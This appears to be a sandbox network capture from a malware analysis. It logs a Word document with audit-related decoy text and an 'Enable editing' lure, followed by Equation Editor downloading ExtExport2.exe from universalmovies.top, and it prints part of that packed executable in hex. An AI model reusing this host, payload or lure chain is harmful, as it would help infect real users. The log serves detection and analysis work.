                                          2024-06-24 16:23:10 UTC1369INData Raw: 63 6f 6e 74 72 6f 6c 20 64 65 66 69 63 69 65 6e 63 69 65 73 20 69 64 65 6e 74 69 66 69 65 64 20 64 75 72 69 6e 67 20 74 68 65 20 61 75 64 69 74 20 74 68 61 74 20 61 72 65 20 6e 6f 74 20 63 6f 6e 73 69 64 65 72 65 64 20 73 65 76 65 72 65 20 65 6e 6f 75 67 68 20 74 6f 20 62 65 20 73 69 67 6e 69 66 69 63 61 6e 74 20 64 65 66 69 63 69 65 6e 63 69 65 73 20 6f 72 20 6d 61 74 65 72 69 61 6c 20 77 65 61 6b 6e 65 73 73 65 73 20 6e 65 65 64 20 6e 6f 74 20 62 65 20 63 6f 6d 6d 75 6e 69 63 61 74 65 64 20 69 6e 20 77 72 69 74 69 6e 67 2e 20 49 66 20 61 75 64 69 74 6f 72 73 20 64 65 74 65 72 6d 69 6e 65 20 74 68 65 20 64 65 66 69 63 69 65 6e 63 69 65 73 20 61 72 65 20 69 6d 70 6f 72 74 61 6e 74 20 65 6e 6f 75 67 68 20 74 6f 20 6d 65 72 69 74 20 6d 61 6e 61 67 65 6d 65
                                          Data Ascii: control deficiencies identified during the audit that are not considered severe enough to be significant deficiencies or material weaknesses need not be communicated in writing. If auditors determine the deficiencies are important enough to merit manageme
                                          2024-06-24 16:23:10 UTC1369INData Raw: 20 61 6e 20 61 75 64 69 74 2c 20 74 68 65 20 61 75 64 69 74 6f 72 73 20 6d 69 67 68 74 20 61 6c 73 6f 20 69 64 65 6e 74 69 66 79 20 6f 74 68 65 72 20 6d 61 74 74 65 72 73 20 74 68 61 74 20 61 72 65 6e 92 74 20 63 6f 6e 73 69 64 65 72 65 64 20 64 65 66 69 63 69 65 6e 63 69 65 73 20 69 6e 20 69 6e 74 65 72 6e 61 6c 20 63 6f 6e 74 72 6f 6c 2c 20 62 75 74 20 61 72 65 20 6f 70 70 6f 72 74 75 6e 69 74 69 65 73 20 66 6f 72 20 73 74 72 65 6e 67 74 68 65 6e 69 6e 67 20 70 72 6f 63 65 64 75 72 65 73 20 61 6e 64 2f 6f 72 20 6f 70 65 72 61 74 69 6e 67 20 64 65 66 69 63 69 65 6e 63 69 65 73 2e 20 54 68 65 72 65 20 69 73 20 6e 6f 20 72 65 71 75 69 72 65 6d 65 6e 74 20 66 6f 72 20 74 68 65 20 61 75 64 69 74 6f 72 73 20 74 6f 20 63 6f 6d 6d 75 6e 69 63 61 74 65 20 6f 74
                                          Data Ascii: an audit, the auditors might also identify other matters that arent considered deficiencies in internal control, but are opportunities for strengthening procedures and/or operating deficiencies. There is no requirement for the auditors to communicate ot
                                          2024-06-24 16:23:10 UTC1369INData Raw: 68 65 20 4d 61 6e 61 67 65 6d 65 6e 74 20 4c 65 74 74 65 72 20 63 61 6e 20 62 65 20 61 20 62 65 6e 65 66 69 63 69 61 6c 20 74 6f 6f 6c 20 66 6f 72 20 61 73 73 69 73 74 69 6e 67 20 6d 61 6e 61 67 65 6d 65 6e 74 20 6f 72 20 74 68 6f 73 65 20 63 68 61 72 67 65 64 20 77 69 74 68 20 67 6f 76 65 72 6e 61 6e 63 65 20 69 6e 20 66 75 6c 66 69 6c 6c 69 6e 67 20 74 68 65 69 72 20 72 65 73 70 6f 6e 73 69 62 69 6c 69 74 69 65 73 25 34 34 25 36 46 25 36 33 25 37 35 25 36 44 25 36 35 25 36 45 25 37 34 25 32 30 25 36 33 25 37 32 25 36 35 25 36 31 25 37 34 25 36 35 25 36 34 25 32 30 25 36 39 25 36 45 25 32 30 25 36 35 25 36 31 25 37 32 25 36 43 25 36 39 25 36 35 25 37 32 25 32 30 25 37 36 25 36 35 25 37 32 25 37 33 25 36 39 25 36 46 25 36 45 25 32 30 25 36 44 25 36 39 25
                                          Data Ascii: he Management Letter can be a beneficial tool for assisting management or those charged with governance in fulfilling their responsibilities%44%6F%63%75%6D%65%6E%74%20%63%72%65%61%74%65%64%20%69%6E%20%65%61%72%6C%69%65%72%20%76%65%72%73%69%6F%6E%20%6D%69%
                                          2024-06-24 16:23:10 UTC1369INData Raw: 32 25 36 46 25 36 34 25 37 35 25 36 33 25 37 34 25 37 33 25 32 30 25 36 31 25 36 45 25 36 34 25 32 30 25 37 33 25 36 35 25 37 32 25 37 36 25 36 39 25 36 33 25 36 35 25 37 33 25 32 45 25 32 30 25 34 37 25 37 35 25 36 35 25 37 32 25 36 39 25 36 43 25 36 43 25 36 31 25 32 30 25 36 44 25 36 31 25 37 32 25 36 42 25 36 35 25 37 34 25 36 39 25 36 45 25 36 37 25 32 30 25 37 33 25 37 34 25 37 32 25 36 31 25 37 34 25 36 35 25 36 37 25 37 39 25 32 30 25 36 39 25 37 33 25 32 30 25 37 30 25 37 35 25 36 32 25 36 43 25 36 39 25 36 33 25 36 39 25 37 34 25 37 39 25 32 30 25 37 30 25 37 32 25 36 31 25 36 33 25 37 34 25 36 39 25 36 33 25 36 35 25 37 33 25 32 43 25 32 30 25 36 43 25 36 46 25 37 37 25 32 44 25 36 33 25 36 46 25 37 33 25 37 34 25 32 30 25 36 44 25 36 31 25 37
                                          Data Ascii: 2%6F%64%75%63%74%73%20%61%6E%64%20%73%65%72%76%69%63%65%73%2E%20%47%75%65%72%69%6C%6C%61%20%6D%61%72%6B%65%74%69%6E%67%20%73%74%72%61%74%65%67%79%20%69%73%20%70%75%62%6C%69%63%69%74%79%20%70%72%61%63%74%69%63%65%73%2C%20%6C%6F%77%2D%63%6F%73%74%20%6D%61%7
                                          2024-06-24 16:23:10 UTC1369INData Raw: 25 36 31 25 36 45 25 36 34 25 32 30 25 36 32 25 36 43 25 36 43 25 32 30 70 6c 65 61 73 65 20 63 6c 69 63 6b 20 45 6e 61 62 6c 65 20 65 64 69 74 69 6e 67 20 66 72 6f 6d 20 74 68 65 20 79 65 6c 6c 6f 77 20 62 61 72 20 61 62 6f 76 65 2e 54 68 65 20 69 6e 64 65 70 65 6e 64 65 6e 74 20 61 75 64 69 74 6f 72 73 92 20 6f 70 69 6e 69 6f 6e 20 73 61 79 73 20 74 68 65 20 66 69 6e 61 6e 63 69 61 6c 20 73 74 61 74 65 6d 65 6e 74 73 20 61 72 65 20 66 61 69 72 6c 79 20 73 74 61 74 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 62 61 73 69 73 20 6f 66 20 61 63 63 6f 75 6e 74 69 6e 67 20 75 73 65 64 20 62 79 20 79 6f 75 72 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 2e 20 53 6f 20 77 68 79 20 61 72 65 20 74 68 65 20 61 75 64 69 74 6f 72 73 20 67
                                          Data Ascii: %61%6E%64%20%62%6C%6C%20please click Enable editing from the yellow bar above.The independent auditors opinion says the financial statements are fairly stated in accordance with the basis of accounting used by your organization. So why are the auditors g
                                          2024-06-24 16:23:10 UTC1369INData Raw: 64 69 74 20 74 6f 20 64 65 74 65 72 6d 69 6e 65 20 77 68 65 74 68 65 72 20 74 68 65 20 64 65 66 69 63 69 65 6e 63 79 2c 20 6f 72 20 61 20 63 6f 6d 62 69 6e 61 74 69 6f 6e 20 6f 66 20 64 65 66 69 63 69 65 6e 63 69 65 73 2c 20 69 73 20 73 65 76 65 72 65 20 65 6e 6f 75 67 68 20 74 6f 20 62 65 20 63 6f 6e 73 69 64 65 72 65 64 20 61 20 6d 61 74 65 72 69 61 6c 20 77 65 61 6b 6e 65 73 73 20 6f 72 20 73 69 67 6e 69 66 69 63 61 6e 74 20 64 65 66 69 63 69 65 6e 63 79 2e 20 49 6e 20 61 73 73 65 73 73 69 6e 67 20 74 68 65 20 64 65 66 69 63 69 65 6e 63 79 2c 20 61 75 64 69 74 6f 72 73 20 63 6f 6e 73 69 64 65 72 20 74 68 65 20 6d 61 67 6e 69 74 75 64 65 20 6f 66 20 70 6f 74 65 6e 74 69 61 6c 20 6d 69 73 73 74 61 74 65 6d 65 6e 74 73 20 6f 66 20 79 6f 75 72 20 66 69 6e
                                          Data Ascii: dit to determine whether the deficiency, or a combination of deficiencies, is severe enough to be considered a material weakness or significant deficiency. In assessing the deficiency, auditors consider the magnitude of potential misstatements of your fin
                                          2024-06-24 16:23:10 UTC1369INData Raw: 74 20 65 6d 70 6c 6f 79 65 65 73 20 6f 72 20 62 79 20 68 69 72 69 6e 67 20 61 64 64 69 74 69 6f 6e 61 6c 20 65 6d 70 6c 6f 79 65 65 73 20 6f 72 20 61 6e 6f 74 68 65 72 20 73 65 72 76 69 63 65 20 70 72 6f 76 69 64 65 72 20 74 6f 20 70 72 65 70 61 72 65 20 74 68 65 6d 2e 20 4e 6f 6e 70 72 6f 66 69 74 73 20 6d 61 79 20 6f 70 74 20 74 6f 20 64 6f 63 75 6d 65 6e 74 20 74 68 65 69 72 20 65 78 70 6c 61 6e 61 74 69 6f 6e 20 76 69 61 20 61 20 4d 61 6e 61 67 65 6d 65 6e 74 20 52 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 77 72 69 74 74 65 6e 20 63 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 2e 20 52 65 67 61 72 64 6c 65 73 73 20 6f 66 20 74 68 65 20 65 78 70 6c 61 6e 61 74 69 6f 6e 2c 20 6d 61 74 65 72 69 61 6c 20 77 65 61 6b 6e 65 73 73 65 73 20 61 6e 64 20 73 69 67 6e
                                          Data Ascii: t employees or by hiring additional employees or another service provider to prepare them. Nonprofits may opt to document their explanation via a Management Response in the written communication. Regardless of the explanation, material weaknesses and sign


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          6192.168.2.2249172104.21.74.1914432780C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          TimestampBytes transferredDirectionData
                                          2024-06-24 16:23:11 UTC152OUTHEAD /notorious.doc HTTP/1.1
                                          User-Agent: Microsoft Office Existence Discovery
                                          Host: universalmovies.top
                                          Content-Length: 0
                                          Connection: Keep-Alive
                                          2024-06-24 16:23:11 UTC840INHTTP/1.1 200 OK
                                          Date: Mon, 24 Jun 2024 16:23:11 GMT
                                          Content-Type: application/msword
                                          Content-Length: 618938
                                          Connection: close
                                          Last-Modified: Mon, 24 Jun 2024 08:04:45 GMT
                                          ETag: "6679289d-971ba"
                                          Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                          Cache-Control: max-age=315360000
                                          CF-Cache-Status: HIT
                                          Age: 4727
                                          Accept-Ranges: bytes
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LaYey8JRlZOqq9pmCIOh4K%2Fs6%2FWjvmevfYpTTthTr%2Fv0qBufoIPKRpP0aMFCaUvXUl0aP58oSiZLIxTgZWL5M1pWaLdc7kjVzP9kwJp4edDBqQ3cMDD%2FpA3C2zaXUWc9T4lx3ggY"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                          X-Content-Type-Options: nosniff
                                          Server: cloudflare
                                          CF-RAY: 898e0f996cdc42c0-EWR
                                          alt-svc: h3=":443"; ma=86400


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          7192.168.2.2249173104.21.74.1914433404C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                          TimestampBytes transferredDirectionData
                                          2024-06-24 16:23:12 UTC320OUTGET /ExtExport2.exe HTTP/1.1
                                          Accept: */*
                                          Accept-Encoding: gzip, deflate
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                          Host: universalmovies.top
                                          Connection: Keep-Alive
                                          2024-06-24 16:23:12 UTC841INHTTP/1.1 200 OK
                                          Date: Mon, 24 Jun 2024 16:23:12 GMT
                                          Content-Type: application/octet-stream
                                          Content-Length: 644096
                                          Connection: close
                                          Last-Modified: Mon, 24 Jun 2024 07:55:16 GMT
                                          ETag: "66792664-9d400"
                                          Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                          Cache-Control: max-age=315360000
                                          CF-Cache-Status: HIT
                                          Age: 27528
                                          Accept-Ranges: bytes
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D7mqhg2hELFBTXpySojdKzUwP9wDyFoEYhW9cqp2BBRoxtqUrAR9A3IOgF2ridi29YPMvGnMu9MsuPdsGOcAIJ1nhodX5fRMVGjjQDZ%2FgpWgWhAnJitYFSYHysay4iLe1EuM7aQE"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                          X-Content-Type-Options: nosniff
                                          Server: cloudflare
                                          CF-RAY: 898e0fa0096942be-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-06-24 16:23:12 UTC528INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 16 73 92 92 52 12 fc c1 52 12 fc c1 52 12 fc c1 14 43 1d c1 50 12 fc c1 cc b2 3b c1 53 12 fc c1 5f 40 23 c1 61 12 fc c1 5f 40 1c c1 e3 12 fc c1 5f 40 1d c1 67 12 fc c1 5b 6a 7f c1 5b 12 fc c1 5b 6a 6f c1 77 12 fc c1 52 12 fd c1 72 10 fc c1 e7 8c 16 c1 02 12 fc c1 e7 8c 23 c1 53 12 fc c1 5f 40 27 c1 53 12 fc c1 52 12 6b c1 53 12 fc c1 e7 8c 22 c1 53 12 fc c1 52 69 63 68 52 12 fc
                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$sRRRCP;S_@#a_@_@g[j[[jowRr#S_@'SRkS"SRichR
                                          2024-06-24 16:23:12 UTC1369INData Raw: 00 80 0c 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 70 05 00 00 90 0c 00 00 64 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 70 04 00 00 00 12 00 00 6c 04 00 00 68 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Data Ascii: UPX1pd@.rsrcplh@
                                          2024-06-24 16:23:12 UTC1369INData Raw: 07 37 60 0a 38 06 b7 ae dd 21 8b 00 90 f0 af 39 18 05 8b 39 a8 6e 47 0e 1a 00 ec 94 50 eb 86 50 f0 eb df 3c 5e 05 1f 13 10 cc f8 1a 80 90 e2 ee 37 12 db 43 c7 45 fc fe d5 89 5d f0 b1 5a 6b 5b dc 40 0c 88 1d 17 eb 6f 84 f0 42 53 0a fc 58 b4 eb db 04 f8 57 8f 39 5c 7e 34 fc 8d 86 83 17 18 76 01 8d 56 26 9e f7 d9 89 55 85 b7 fd 0a 7e 80 38 08 73 53 83 44 40 26 05 f0 f7 a4 03 c1 30 77 6c 37 c1 3b 46 da 1e 7c e2 8b 0e 3b d8 4c 2b c3 50 fe df ff 66 77 03 10 43 02 8d 04 c6 50 57 ed 24 8b 76 04 85 f6 75 8d bf 47 70 f0 d8 57 b1 e3 81 c1 99 c8 3b 87 d0 ee fe d9 74 20 2b cb 8d 83 7b 51 03 c6 7d b0 dc fe df 95 55 8d 99 f1 5c 8a 08 03 d8 80 f9 14 74 44 08 08 75 4c c3 8d 35 37 2e f8 83 f9 0c b9 20 71 ad 3e 85 61 56 02 18 40 04 bd 1e 2d 37 0d 05 74 fc 6c f0 50 51 57 6f
                                          Data Ascii: 7`8!99nGPP<^7CE]Zk[@oBSXW9\~4vV&U~8sSD@&0wl7;F|;L+PfwCPW$vuGpW;t +{Q}U\tDuL57. q>aV@-7tlPQWo
                                          2024-06-24 16:23:12 UTC1369INData Raw: 8e 68 2f e4 47 01 5f 89 68 5e d4 15 d3 b4 97 b8 08 8d 4d 10 22 2b 1a 14 d2 f7 61 d1 4b 14 eb c8 c8 eb 9a d3 18 a0 85 6d 75 c0 81 c9 94 d2 aa 75 61 45 43 47 dc 25 53 bf 04 72 2c 88 da 34 4d 80 3a 04 24 20 1c 51 bf b8 33 26 53 50 37 20 8b f0 8a 24 38 5d 34 5f fd d3 15 e0 53 6a 11 4b 14 50 6a 30 2d e6 88 30 90 f9 e0 39 9f 8c 77 71 9f 00 68 88 57 fc 14 30 00 25 5c f7 ff eb 98 09 38 4a dc f6 07 83 57 80 7e 3a 4a 85 6d 56 3a b1 12 0e 45 a2 83 71 1a 8d 45 bc 29 f8 3a 80 36 95 34 52 d4 d8 8b 56 44 e0 47 74 34 06 48 76 10 5e 55 f8 89 b5 b8 0a 83 50 ee 98 4f bc a9 5e f8 ee ad f1 0e 83 be e0 9a 68 18 81 33 62 c5 db 1c 3d 45 80 4d cc 2b c1 8a d8 89 6b a7 69 3f fc d0 2b d0 c4 e8 e4 94 f0 a6 05 28 f8 40 e4 53 f8 e4 ba 0f 0e c3 ad e0 af 45 f8 30 e8 60 ec 99 f7 8e 42 3c
                                          Data Ascii: h/G_h^M"+aKmuuaECG%Sr,4M:$ Q3&SP7 $8]4_SjKPj0-09wqhW0%\8JW~:JmV:EqE):64RVDGt4Hv^UPO^h3b=EM+ki?+(@SE0`B<
                                          2024-06-24 16:23:12 UTC1369INData Raw: 80 c8 82 23 75 f2 8d b7 f8 7a 7c e4 7d fc 50 97 20 24 24 12 ac 78 f4 95 ff de 46 89 0d b3 24 8b c6 ff 05 8b 0c b1 89 39 a7 12 6c 68 5d 49 b8 4f 04 24 eb 6a 03 85 38 bf fe 5e 33 ff 3b ce 7e 0d f3 24 b4 23 6e 3d f6 60 e7 74 b7 df eb ac e6 05 1e fe db eb c3 62 eb 85 46 3b f1 7c d1 eb d6 db 72 cf f1 0b 26 e4 d2 6a eb ef 5c 3b 47 3f 38 69 c3 78 73 8a 4f 74 cd e6 0a 39 31 39 62 6f c3 75 06 0d 82 f5 6d 64 d0 a6 15 52 60 06 33 db 77 bf 6f fe c2 57 cc 02 56 33 c0 89 1d 18 b8 40 88 0d bc 57 83 61 03 18 e0 cf ff a2 69 73 f0 a3 7d 97 ee 1b 36 3f c0 15 c8 d0 0b d4 cb 77 69 66 c8 16 d8 dc 0b e0 6f 78 00 be e4 8f e8 63 36 6a 7c 58 66 62 34 92 75 75 c4 ce ad 0c 5e 6c f9 0c b8 18 50 42 0b 14 22 df ec 7c 2d 67 1c 43 20 2b 24 0b 28 19 7c 2f 2e 2c 23 30 43 34 71 be cb e5 f2
                                          Data Ascii: #uz|}P $$xF$9lh]IO$j8^3;~$#n=`tbF;|r&j\;G?8ixsOt919boumdR`3woWV3@Wais}6?wifoxc6j|Xfb4uu^lPB"|-gC +$(|/.,#0C4q
                                          2024-06-24 16:23:12 UTC1369INData Raw: 40 13 18 0c 6b 16 64 59 fc 09 30 da 3b c3 d5 7c 1d 0f 87 63 a2 c7 b4 27 24 95 3e 15 42 6d 08 1e ee 87 41 1e d7 e2 a7 56 56 53 3f c7 6c 13 d0 2d fe a8 a8 c6 4d 28 88 96 cf 88 8e 91 f6 a5 09 e7 0b 1c a3 7c 48 f6 c1 01 4e 14 9d a6 9d a6 10 04 f4 82 d8 a8 ff 5c 4a 86 de 95 0d af 80 bb 98 ad 01 df 7a 01 c1 12 7b 60 31 0a 54 2c 74 0b 35 36 af 57 6a eb b4 14 3c 45 07 3a e6 2c 8a f4 c7 fe 4b 60 57 cb 34 18 5c e6 1e 3f ff 73 50 5e 69 ff 00 7c 7a bc eb c4 14 54 78 b0 eb bf dd 70 35 06 2e b0 c0 64 03 bb fa f3 3c cf b3 06 bc 18 36 54 72 90 cf 7b 36 cf cc ea bd 1e 56 0e 92 ae 79 ef d9 3c d4 c0 7b be 06 e4 0e fd 7b 78 cf b3 be 19 3a a4 06 c2 3e c7 1e 9e e7 3d cf 7f 2c 4a 2e 68 86 26 18 aa af ef a6 86 be d5 7d b8 77 46 97 be f8 75 16 8b 4e 6c 36 5e a9 66 c7 40 7e 96 91
                                          Data Ascii: @kdY0;|c'$>BmAVVS?l-M(|HN\Jz{`1T,t56Wj<E:,K`W4\?sP^i|zTxp5.d<6Tr{6Vy<{{x:>=,J.h&}wFuNl6^f@~
                                          2024-06-24 16:23:12 UTC1369INData Raw: 9c f5 bf 25 ff 01 f0 d4 a5 99 c1 3a ef 8d 32 2c c4 69 2b 12 64 24 2c 85 2f 03 e6 42 07 57 bc 33 10 80 db ed 34 c1 9e 6e 44 2f c8 48 74 23 a0 85 c6 70 40 0c 80 9b 5a 49 ba d2 a6 03 dd 90 34 c7 1c 10 1c 53 54 fc 34 c3 6a 30 ee 38 45 18 3d f0 01 23 01 f5 09 90 0c 76 bf dd 00 a3 ef 75 d3 27 10 a3 25 eb c6 00 24 3a cc 0d 68 9d 35 db a8 7d 67 e0 19 c5 08 eb aa bc 33 56 0a 43 27 dc 35 2d eb 99 6d 64 0e 72 8b ab 4e e1 8d 4d a4 78 a0 99 3c 6f 5a 7b 6f 1c a0 c7 45 b4 e0 68 28 b8 04 bc c0 88 5d c4 7c 87 66 7d 3a 2d 3f ec be c5 8a 45 c4 88 01 af 7d 68 0b fd 38 60 96 88 66 e0 18 6f a6 35 57 85 3d d0 35 41 1e c8 72 d4 83 0f 7d 9a d8 dc 3f 39 c2 c0 e8 40 17 03 64 51 4a 2d e9 76 b6 c3 33 36 a4 50 2c 17 83 e6 99 70 6a 6e 6c 07 33 f6 34 d0 56 9c 0c e0 05 e7 db f6 d5 76 1c
                                          Data Ascii: %:2,i+d$,/BW34nD/Ht#p@ZI4ST4j08E=#vu'%$:h5}g3VC'5-mdrNMx<oZ{oEh(]|f}:-?E}h8`fo5W=5Ar}?9@dQJ-v36P,pjnl34Vv
                                          2024-06-24 16:23:12 UTC1369INData Raw: 4f 51 8b 45 08 8b 08 48 04 89 4a 04 0a 08 02 31 0a de 1e 40 0c 89 42 54 00 a3 01 15 31 31 a1 9d 98 34 28 c6 3f 8a c1 e0 02 50 24 57 31 7c 18 26 c2 62 37 1c 40 18 47 17 a3 e2 c6 75 68 9f 95 c2 27 a4 75 46 59 1c 34 56 f0 c2 e8 be a1 10 20 b9 1b 8b a8 36 79 31 de be f8 42 08 51 fd 36 61 4d 75 da d9 38 68 72 e0 53 2a 3e d9 6d 95 71 05 30 8c a8 3d 8d 4f 71 82 05 ba c7 66 14 9e 7d fc 24 c6 85 31 f1 04 05 84 01 d1 53 dd 40 05 38 86 37 86 8b 84 ab 99 2b 75 8d 5a c3 4c c7 64 38 dd 30 d2 5a 44 34 80 83 c6 04 08 9f 72 ef 05 ee 60 7c ef 68 2a 30 09 60 32 fc b8 54 ba 0f 1d 3c 38 5e 68 30 39 63 08 56 3f a6 06 16 87 44 d0 45 a5 1e e0 f5 81 ec cc 8e 71 88 64 10 ae 81 a6 26 d7 d6 04 5f 23 01 b0 7c a8 a3 72 3b 87 a2 33 cc a6 01 5c 99 94 3b 24 b8 cb db 4b 82 18 50 43 6d 28
                                          Data Ascii: OQEHJ1@BT114(?P$W1|&b7@Guh'uFY4V 6y1BQ6aMu8hrS*>mq0=Oqf}$1S@87+uZLd80ZD4r`|h*0`2T<8^h09cV?DEqd&_#|r;3\;$KPCm(
                                          2024-06-24 16:23:12 UTC1369INData Raw: 2c 91 a7 5e 56 56 a8 74 c0 0a cd bb 44 c3 a4 8d 64 80 8c 01 22 06 30 e2 25 85 74 14 32 f0 03 9d dc 4f a6 33 ff a3 91 96 6f fe 35 08 5f 46 0d 70 04 08 06 10 89 74 24 14 e0 4a cf f3 16 18 20 24 95 7b 80 17 30 36 28 06 00 f9 08 df fa a9 bb e0 64 62 05 71 bc 97 b0 32 25 a8 59 7a 88 6b 76 6f 26 10 0d f6 98 3a 57 1a c0 fd 03 53 2b 48 a1 23 42 e9 24 81 6e 86 57 68 01 0c c1 40 6a 90 1d 9c fe 24 18 c9 36 04 6d 82 3e f7 c6 27 4a 65 ad f7 16 f3 79 85 2f bb 57 33 ad 54 6a 0c db f0 0e 74 12 d3 90 89 b4 40 e5 ba 35 4b b8 09 26 b4 eb ef 51 2a e8 13 83 53 cb 48 e2 4e d7 51 08 8a de 5e 31 aa 17 ab 25 56 2f d7 57 c0 45 fc 53 16 54 03 c1 50 53 a0 36 dc c1 02 5b 60 26 41 2a 68 53 53 65 81 8f 99 eb 89 06 29 5f 8b 58 42 17 7d 2e 64 a8 01 9e 83 c8 01 c0 83 4b c8 56 a0 20 9f 0b
                                          Data Ascii: ,^VVtDd"0%t2O3o5_Fpt$J ${06(dbq2%Yzkvo&:WS+H#B$nWh@j$6m>'Jey/W3Tjt@5K&Q*SHNQ^1%V/WESTPS6[`&A*hSSe)_XB}.dKV
                                          2024-06-24 16:23:12 UTC1369INData Raw: ef f8 ff dc 7d ec d8 d2 df e0 f6 c4 41 02 d9 cb d8 d1 15 f6 dd 6d 9e 61 3b 8c ba 1c db dd da 37 22 de d9 57 9e 25 f8 33 74 14 9a 62 08 41 40 40 7c fc 4e 75 0b 5b de eb e9 dd d9 dd d8 4d aa df f8 4e 02 83 f9 02 72 43 6a 00 58 d6 f8 2f 4c 05 f2 49 c2 0a 8a 3c 3a 8a 5c 3a 01 69 6f 3d 3a da 84 42 e8 8b 4e 0e f4 55 e3 fd c3 d8 19 3b d1 72 de 0e 17 7a 1a 7b 23 62 85 c6 33 de 20 ef ae 95 f1 cc 6d 6a 06 d2 03 ce 49 0d 5f 8b 60 17 03 51 d3 54 2c b3 01 f0 ff bb 87 57 b2 18 d9 14 38 40 84 d2 74 3e 80 fa 7f 77 16 3b c6 81 83 56 cb 84 ae 56 b8 2c 9b f6 76 08 b5 8d 4a 3a f9 1d 76 22 0e 20 0f 76 6f 66 37 c7 24 80 6e 5a 04 76 26 40 96 45 80 39 9f 41 77 4a 68 eb c0 ba 1f ce 4f ba 02 3e 6a 90 63 13 03 b8 72 eb a8 eb 4a 3c 24 5d 02 90 72 0c 8a 0a 60 55 84 f0 20 1a 08 2e 22
                                          Data Ascii: }Ama;7"W%3tbA@@|Nu[MNrCjX/LI<:\:io=:BNU;rz{#b3 mjI_`QT,W8@t>w;VV,vJ:v" vof7$nZv&@E9AwJhO>jcrJ<$]r`U ."


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8192.168.2.2249174172.67.162.95443
                                          TimestampBytes transferredDirectionData
                                          2024-06-24 16:23:15 UTC166OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 75 6e 69 76 65 72 73 61 6c 6d 6f 76 69 65 73 2e 74 6f 70 0d 0a 0d 0a
                                          Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: universalmovies.top
                                          2024-06-24 16:23:15 UTC746INHTTP/1.1 405 Method Not Allowed
                                          Date: Mon, 24 Jun 2024 16:23:15 GMT
                                          Content-Type: text/html; charset=iso-8859-1
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Allow: OPTIONS,HEAD,GET,POST,TRACE
                                          CF-Cache-Status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v0rC%2B2W51%2BQ%2BW77jjDyshEsR8BvIjEPC%2FF0FgN0kdyF2%2FIf%2F7nKNQdJNA91F%2FIMxWhHcyOQJpJEuo9voDWt939skpB11Qtj%2BVg8BnPmMTbVhGpdvujwmxJ5ZgTd2%2Fh7YyHg%2BCXrC"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                          X-Content-Type-Options: nosniff
                                          Server: cloudflare
                                          CF-RAY: 898e0fb2aeee42b9-EWR
                                          alt-svc: h3=":443"; ma=86400
